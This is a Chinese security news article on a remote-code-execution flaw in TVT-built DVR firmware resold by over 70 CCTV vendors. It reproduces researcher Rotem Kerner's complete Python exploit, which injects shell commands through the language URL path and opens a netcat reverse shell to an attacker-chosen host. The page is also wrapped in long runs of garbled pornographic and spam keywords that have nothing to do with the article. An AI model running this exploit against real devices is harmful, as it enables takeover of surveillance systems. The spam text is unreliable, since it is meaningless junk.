精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

黑掉70多款監(jiān)控攝像頭?so easy!

安全 終端安全
近日,一位安全研究員發(fā)現(xiàn)70多個供應(yīng)商售賣的監(jiān)控攝像頭很容易受到遠(yuǎn)程代碼執(zhí)行(RCE)攻擊。

近日,一位安全研究員發(fā)現(xiàn)70多個供應(yīng)商售賣的監(jiān)控攝像頭很容易受到遠(yuǎn)程代碼執(zhí)行(RCE)攻擊。

根據(jù)安全研究員Rotem Kemer研究發(fā)現(xiàn),超過70個供應(yīng)商售賣的監(jiān)控攝像頭都很容喲受到遠(yuǎn)程代碼執(zhí)行(RCE)攻擊。

[[164830]]

研究人員注意到供應(yīng)商正在售賣的商品使用的是同樣的、易受到RCE攻擊的固件。

在“白色標(biāo)簽”的經(jīng)營模式下,各種各樣的供應(yīng)商只是簡單地將自己的標(biāo)簽貼在相同的產(chǎn)品上進(jìn)行售賣,但是不幸的是,他們都沒有開發(fā)軟件硬件的資格。

這個脆弱的固件是由一家中國制造商TVT開發(fā)的,Kerner分析之后發(fā)現(xiàn)了閉路電視系統(tǒng)的DVR盒易于攻擊的原因。

使用這種固件的產(chǎn)品是在一家銷售閉路電視系統(tǒng)的以色列公司購買的,其代碼也表明了這是一個脆弱的HTTP服務(wù)器。

安全漏洞依賴于服務(wù)器來檢查是否存在給定語言的目錄。如果該文件夾不存在,軟件會通過提取遠(yuǎn)程命令來執(zhí)行打開口令。

下面是研究人員的解釋:

它會讀取URL,如果URL包含以下的內(nèi)容/language/[language]/index.html 。

如果該目錄存在的話,就會提取斜杠之間的【language】內(nèi)容并且進(jìn)行檢查;如果不存在,就會直接執(zhí)行此命令

tar –zxf /mnt/mtd/WebSites/language.tar.gz [language]/* -C /nfsdir/language

這基本上就是給了我們一個遠(yuǎn)程命令執(zhí)行的機(jī)會。

下面是影響固件漏洞的概念證明代碼:

  1. #!/usr/bin/python  
  2. # http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html  
  3. __author__ = 'Rotem Kerner' 
  4. from sys import argv  
  5. import optparse  
  6. from urlparse import urlparse  
  7. from re import compile  
  8. import socket  
  9. import requests  
  10. from requests.exceptions import ConnectionError, Timeout, ContentDecodingError  
  11. from socket import timeout  
  12. def main():  
  13.     # parse command line options and atguments  
  14.     optparseoptparser = optparse.OptionParser(usage="%s <target-url> [options]" % argv[0])  
  15.     optparser.add_option('-c','--check',action="store_true",dest="checkvuln"default=False,  
  16.                          help="Check if target is vulnerable")  
  17.     optparser.add_option('-e','--exploit', action="store"type="string"dest="connback",  
  18.                          help="Fire the exploit against the given target URL")  
  19.     (options, args) = optparser.parse_args()  
  20.     try:  
  21.         target = args[0]  
  22.     except IndexError:  
  23.         optparser.print_help()  
  24.         exit()  
  25.     target_url = urlparse(target)  
  26.     # validating hostname  
  27.     if not target_url.hostname:  
  28.         print "[X] supplied target "%s" is not a valid URL" % target  
  29.         optparser.print_help()  
  30.         exit()  
  31.     # A little hack to handle read timeouts, since urllib2 doesnt give us this functionality.  
  32.     socket.setdefaulttimeout(10)  
  33.     # is -c flag on check if target url is vulnrable.  
  34.     if options.checkvuln is True:  
  35.         print "[!] Checking if target "%s" is vulnable..." % target_url.netloc  
  36.         try:  
  37.             # Write file  
  38.             raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js'  
  39.                          % (target_url.scheme, target_url.netloc))  
  40.             # Read the file.  
  41.             response = raw_url_request('%s:/%s/../../../../../../../mnt/mtd/test' % (target_url.scheme, target_url.netloc))  
  42.             # remove it..  
  43.             raw_url_request('%s://%s/language/Swedish${IFS}&&rm${IFS}test&&tar${IFS}/string.js'  
  44.                          % (target_url.scheme, target_url.netloc))  
  45.         except (ConnectionError, Timeout, timeout) as e:  
  46.             print "[X] Unable to connect. reason: %s.  exiting..." % e.message  
  47.             return  
  48.         if response.text[0] != '1':   
  49.             print "[X] Expected response content first char to be '1' got %s. exiting..." % response.text  
  50.             return  
  51.         print "[V] Target "%s" is vulnerable!" % target_url.netloc  
  52.     # if -e is on then fire exploit,  
  53.     if options.connback is not None:  
  54.         # Validate connect-back information.  
  55.         pattern = compile('(?P<host>[a-zA-Z0-9.-]+):(?P<port>[0-9]+)')  
  56.         match = pattern.search(options.connback)  
  57.         if not match:  
  58.             print "[X] given connect back "%s" should be in the format for host:port" % options.connback  
  59.             optparser.print_help()  
  60.             exit()  
  61.         # fire remote code execution!  
  62.         # Three ..  
  63.         try:  
  64.             raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}nc${IFS}%s${IFS}%s${IFS}>e&&${IFS}/a'  
  65.                         % (target_url.scheme, target_url.netloc, match.group('host'), match.group('port')))  
  66.         # Two ...  
  67.             raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}"-e${IFS}$SHELL${IFS}">>e&&${IFS}/a'  
  68.                          % (target_url.scheme, target_url.netloc))  
  69.         # One. Left off!  
  70.             raw_url_request('%s://%s/language/Swedish&&$(cat${IFS}e)${IFS}&>r&&${IFS}/s'  
  71.                          % (target_url.scheme, target_url.netloc))  
  72.         except (ConnectionError, Timeout, timeout) as e:  
  73.             print "[X] Unable to connect reason: %s.  exiting..." % e.message  
  74.         print "[V] Exploit payload sent!, if nothing went wrong we should be getting a reversed remote shell at %s:%s"   
  75.               % (match.group('host'), match.group('port'))  
  76. # Disabling URL encode hack  
  77. def raw_url_request(url):  
  78.     r = requests.Request('GET')  
  79.     r.url = url  
  80.     rr = r.prepare()  
  81.     # set url without encoding  
  82.     r.url = url  
  83.     s = requests.Session()  
  84.     return s.send(r)  
  85. if __name__ == '__main__':  
  86.     main() 

他注意到目前來說有數(shù)以萬計的產(chǎn)品在使用這種HTTP服務(wù)器。他是在查詢了Shodan搜索引擎之后做出的這樣的肯定判斷,而沒在這種搜索引擎中的產(chǎn)品可能數(shù)量更多。

研究者說,“快速查詢Shodan之后發(fā)現(xiàn)其分布超過三萬;這已經(jīng)很多了,但是我相信這還只是一小部分。”

Kerner試圖向最初的制造商TVT報告這個問題,但是沒有受到任何回復(fù)。

責(zé)任編輯:藍(lán)雨淚 來源: FreeBuf
相關(guān)推薦

2021-03-11 10:21:55

特斯拉黑客網(wǎng)絡(luò)攻擊

2009-10-22 09:00:10

Windows 7攝像工具

2014-07-16 13:36:30

MotionLinux監(jiān)控

2019-12-26 12:30:54

攝像頭漏洞攻擊

2013-03-21 09:56:09

2011-04-25 09:16:10

Windows 8

2012-06-23 20:13:44

HTML5

2017-06-20 11:45:52

2024-11-29 16:51:18

2021-08-10 10:59:17

APP攝像頭黑產(chǎn)

2009-08-21 17:24:18

C#控制攝像頭

2009-06-17 11:52:01

Linux

2011-09-08 13:53:20

Linux攝像頭

2023-11-06 12:57:03

2012-06-05 11:59:25

2015-05-11 10:16:20

2021-07-30 16:22:52

攝像頭漏洞CamOver

2018-06-20 11:54:54

2011-09-13 15:51:11

PhoneGap AP

2020-06-04 10:59:10

JavaScript開發(fā)技術(shù)
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號

久久资源在线| 亚洲高清极品| 亚洲免费资源在线播放| 91在线播放国产| 欧美日韩一级大片| 女仆av观看一区| 91福利国产精品| 中文字幕中文字幕在线中心一区 | 亚洲av无日韩毛片久久| 牛牛精品视频在线| xfplay精品久久| 国产日韩欧美在线播放| 国产在线拍揄自揄拍| 国产精品羞羞答答在线观看| 91精品啪在线观看国产60岁| 福利视频免费在线观看| 国产视频三级在线观看播放| 国产精品一区免费在线观看| 51色欧美片视频在线观看| 久久视频一区二区三区| 高清一区二区三区| 欧美日本在线观看| 91九色在线观看视频| 麻豆网站在线看| 91色九色蝌蚪| caoporen国产精品| 亚洲天堂男人网| 国产精品一区亚洲| 欧美人在线视频| 美国黄色特级片| 欧美天堂影院| 欧美一区二区播放| 污视频免费在线观看网站| 91在线超碰| 亚洲免费在线电影| 欧美连裤袜在线视频| 性一交一乱一伧老太| 麻豆精品久久精品色综合| 国产suv精品一区二区| 久久久久久蜜桃| 91精品啪在线观看国产81旧版| 亚洲另类xxxx| 欧类av怡春院| 秋霞一区二区| 欧美顶级少妇做爰| 亚洲精品久久久久久宅男| 外国成人直播| 色综合久久66| 国产免费一区二区三区视频| av在线加勒比| 亚洲国产人成综合网站| 欧美少妇在线观看| 黄色网在线免费看| 亚洲私人黄色宅男| a级网站在线观看| 暖暖日本在线观看| 中文字幕一区二区三区精华液| 色中色综合成人| 男人天堂综合| 久久久一区二区| 蜜桃麻豆www久久国产精品| 四虎在线观看| 91蝌蚪porny九色| 久久久久久久久久码影片| 亚洲 小说区 图片区 都市| 国产成人免费在线观看不卡| 操人视频欧美| 日韩一区二区三区不卡| 成人动漫中文字幕| 九九九九九精品| 欧美孕妇孕交xxⅹ孕妇交| 26uuu色噜噜精品一区二区| 欧美日韩精品免费在线观看视频| 精品欧美不卡一区二区在线观看 | 国产精品一区二区无码对白| 成人av资源网址| 亚洲激情小视频| 女人被狂躁c到高潮| 亚洲婷婷伊人| 在线免费看av不卡| 国产精品免费在线视频| 欧美三区不卡| 欧美做受高潮电影o| 波多野结衣小视频| 久久精品国产99国产精品| 成人美女av在线直播| 亚洲AV无码精品国产| 99久久er热在这里只有精品66| 欧美男人的天堂| av在线第一页| 亚洲精品国产a| 欧美精品99久久| 九色成人搞黄网站| 日韩一二三区视频| 亚洲国产无码精品| 欧美一区2区| 欧美高清视频一区二区| 日韩中文字幕在线观看视频| 久久精品国产免费看久久精品| 91精品国产99久久久久久红楼| 人妻一区二区三区| 国产欧美日韩另类视频免费观看| 成人手机视频在线| 麻豆mv在线看| 欧美日韩第一区日日骚| 亚洲精品乱码久久久久久蜜桃欧美| 伊人成综合网yiren22| 久久久国产视频91| 欧美一区二区三区四| 精品一区二区在线视频| 久久久久久久久久久久久久一区 | 日韩在线一区二区| 亚洲综合在线播放| 免费资源在线观看| 亚洲综合成人在线视频| 少妇一级淫免费放| 欧美成人午夜77777| 久久精品影视伊人网| 久久久久久91亚洲精品中文字幕| 精品一区二区三区不卡| 欧美精品久久久| 色呦呦在线视频| 欧美日韩国产综合一区二区三区| xxxxxx黄色| 中文字幕一区二区三区久久网站 | 日韩成人av在线| 国产一区二区精彩视频| 久久男女视频| 好看的日韩精品| 在线三级电影| 欧美日本视频在线| 人妻aⅴ无码一区二区三区| 好吊视频一区二区三区四区| 国产精品视频网| 色欲av伊人久久大香线蕉影院| 国产精品久久99| 粉嫩虎白女毛片人体| 老汉色老汉首页av亚洲| 欧美激情免费在线| 国产黄频在线观看| 成人免费在线视频| 天天色综合社区| 精品毛片免费观看| 国产精品成人品| 欧美成人综合在线| 精品色蜜蜜精品视频在线观看| 日本人dh亚洲人ⅹxx| 2023国产精品久久久精品双| 国产日韩欧美91| h视频网站在线观看| 色香色香欲天天天影视综合网| 香蕉视频污视频| 亚洲黄页一区| 国产精品一区二区欧美| av中文字幕在线看| 亚洲高清免费观看高清完整版| 国产亚洲成人精品| 国产suv一区二区三区88区| 青青视频免费在线观看| 国产一区二区| 欧美激情第99页| 亚洲国产福利视频| 亚洲国产裸拍裸体视频在线观看乱了 | 日本亚洲精品在线观看| 你懂的在线看| 欧洲精品一区二区| 黄色av片三级三级三级免费看| 美女在线观看视频一区二区| 亚洲精品无人区| 白嫩亚洲一区二区三区| 欧美另类交人妖| 韩国av免费在线| 岛国av午夜精品| 能免费看av的网站| 久久激五月天综合精品| 欧美大片免费播放| 美女网站色精品尤物极品姐弟| 欧美有码在线观看视频| yourporn在线观看视频| 正在播放亚洲一区| 久久丫精品久久丫| 久久久91精品国产一区二区三区| 999精品视频在线| 天天色天天射综合网| 国产精品国产精品国产专区不卡| 中日韩脚交footjobhd| 最新69国产成人精品视频免费| 国产精品久久久久久在线| 亚洲在线中文字幕| 搡老熟女老女人一区二区| 美女视频一区在线观看| 丁香六月激情网| 亚洲人成精品久久久| 成人做爽爽免费视频| 丁香花视频在线观看| 亚洲欧洲一区二区三区久久| 国产精品久久久久久久久久久久久久久久 | 欧美人成在线视频| 可以直接在线观看的av| 欧美一区在线视频| 欧美精品二区三区| ㊣最新国产の精品bt伙计久久| 你懂的在线观看网站| 蜜臂av日日欢夜夜爽一区| 久久久久99精品成人片| av中文一区| 国产精品免费区二区三区观看| 电影亚洲精品噜噜在线观看| 色综合男人天堂| 国产三级视频在线看| 亚洲第一精品夜夜躁人人爽| 中文字幕永久在线观看| 欧美日韩激情小视频| 三级av在线免费观看| 久久一夜天堂av一区二区三区| 日本特黄在线观看| 石原莉奈在线亚洲三区| 日韩成人三级视频| 日韩欧美精品综合| 美乳视频一区二区| 911精品国产| 国产在线拍偷自揄拍精品| 婷婷电影在线观看| 欧美极度另类性三渗透| 日p在线观看| 亚洲欧洲一区二区三区久久| 天天摸天天干天天操| 欧美一区二区性放荡片| 亚洲国产无线乱码在线观看 | 亚洲精品国产suv一区88| 国产不卡av一区二区| 精品午夜一区二区| 91蝌蚪精品视频| 2014国产精品| 亚洲视频资源| 国产欧美 在线欧美| 欧美精品高清| 日韩av电影手机在线观看| 岛国片av在线| 欧美激情精品久久久久| 永久免费网站在线| 久久久久www| 黄av在线免费观看| 精品国产一区av| 免费网站免费进入在线| 亚洲天堂2020| 国产日本在线| 中文字幕精品在线视频| 国产天堂在线| 国产亚洲一区二区在线| 九色在线观看| 在线视频亚洲欧美| av网页在线| 中文字幕国产亚洲2019| 日本在线观看www| 丝袜亚洲欧美日韩综合| 黄色成人影院| 欧美成人免费网| 欧美人与牲禽动交com| 欧美黑人巨大精品一区二区| 性网站在线观看| 欧美肥臀大乳一区二区免费视频| 超碰在线免费播放| 欧美大片欧美激情性色a∨久久| 日韩成人伦理| 久久久久久噜噜噜久久久精品| sm久久捆绑调教精品一区| 欧美一区二区三区艳史| 成人开心激情| 国产在线视频2019最新视频| av在线国产精品| 成人av免费在线看| 日韩欧美影院| 亚洲成人第一| 亚洲午夜精品一区 二区 三区| 嫩草影院中文字幕| 一本久道久久综合婷婷鲸鱼| 熟妇人妻无乱码中文字幕真矢织江| 日本不卡免费在线视频| 91网址在线观看精品| 国产99精品国产| 人妻丰满熟妇aⅴ无码| 欧美韩日一区二区三区四区| 四虎免费在线视频| 香港成人在线视频| 伊人成年综合网| 欧美一区二区三区公司| 香蕉视频国产在线| 日韩中文字幕在线精品| 久草成色在线| 国产精品精品视频一区二区三区| 国产精品日本一区二区不卡视频| 狠狠色综合色区| 四虎成人av| 国产精品裸体瑜伽视频| 免播放器亚洲一区| 在线观看成人动漫| 国产精品三级电影| 久久综合加勒比| 欧美私人免费视频| 黄色aaa大片| 视频直播国产精品| 欧美少妇精品| 亚洲一区二区在线| 欧洲杯半决赛直播| 97超碰在线人人| 久久精品国产亚洲一区二区三区 | 久久久久久影视| 日韩视频中文字幕在线观看| 色综合天天综合网天天看片| 国产成人麻豆精品午夜在线| 亚洲欧洲一区二区三区久久| 啦啦啦中文在线观看日本| 国产在线拍偷自揄拍精品| 亚洲人成网www| 日韩国产小视频| 久久99精品久久久久婷婷| 国产三级国产精品| 亚洲一区中文在线| 中文字幕在线观看高清| 精品视频久久久久久| 久草在线视频资源| 96sao精品视频在线观看| 欧美日韩高清| 黄色免费观看视频网站 | 中文字幕在线观看网址| 一区二区三区在线观看国产| 中文字幕精品一区二| 亚洲美女av在线| 精品极品在线| 粉嫩av免费一区二区三区| 91精品国产调教在线观看| 天天操天天摸天天爽| 久久久久久久久久久久久久久99 | 久久久91麻豆精品国产一区| 一本一道久久a久久精品综合| 午夜在线一区| aaaa黄色片| 亚洲国产cao| 国产91免费看| 久久久人成影片一区二区三区| 国产精品一区二区精品| 国产卡一卡二在线| 久久99精品国产.久久久久| 欧美a在线播放| 91福利国产成人精品照片| 精品无吗乱吗av国产爱色| 国产成人精彩在线视频九色| 国产传媒欧美日韩成人精品大片| 欧美二区在线视频| 91一区二区三区在线播放| 亚洲欧美精品一区二区三区| 亚洲精品不卡在线| 色在线免费观看| 日本一区二区三区免费看| 日韩高清中文字幕一区| 亚洲精品国产精品国自| 欧美男男青年gay1069videost| 国产原创在线观看| 波多野结衣一区二区三区在线观看| 狠色狠色综合久久| 国产激情视频网站| 色婷婷激情综合| 阿v免费在线观看| 成人免费视频97| 午夜电影亚洲| 年下总裁被打光屁股sp| 亚洲r级在线视频| 免费毛片在线| 国产精品视频久久久| 午夜影院欧美| youjizz.com日本| 天天影视涩香欲综合网 | 只有精品亚洲| 91视频 - 88av| av电影一区二区| 免费在线观看av的网站| 综合久久五月天| 亚洲综合网狠久久| 日韩欧美一区二| 中文字幕乱码久久午夜不卡| 国产精品无码在线播放| 欧美黑人xxx| 国产videos久久| 日韩精品在线播放视频| 欧美日韩国产激情| 亚洲乱亚洲乱妇| 99国产精品久久久久老师| 免费视频一区二区三区在线观看| 国产福利在线导航| 欧美成人性战久久| 成人动漫一区| 最新中文字幕久久| 99国产精品久| 一区二区三区免费观看视频| 欧美激情视频一区二区| 精品免费视频| 日本50路肥熟bbw| 欧美日韩国产影片| 77thz桃花论族在线观看|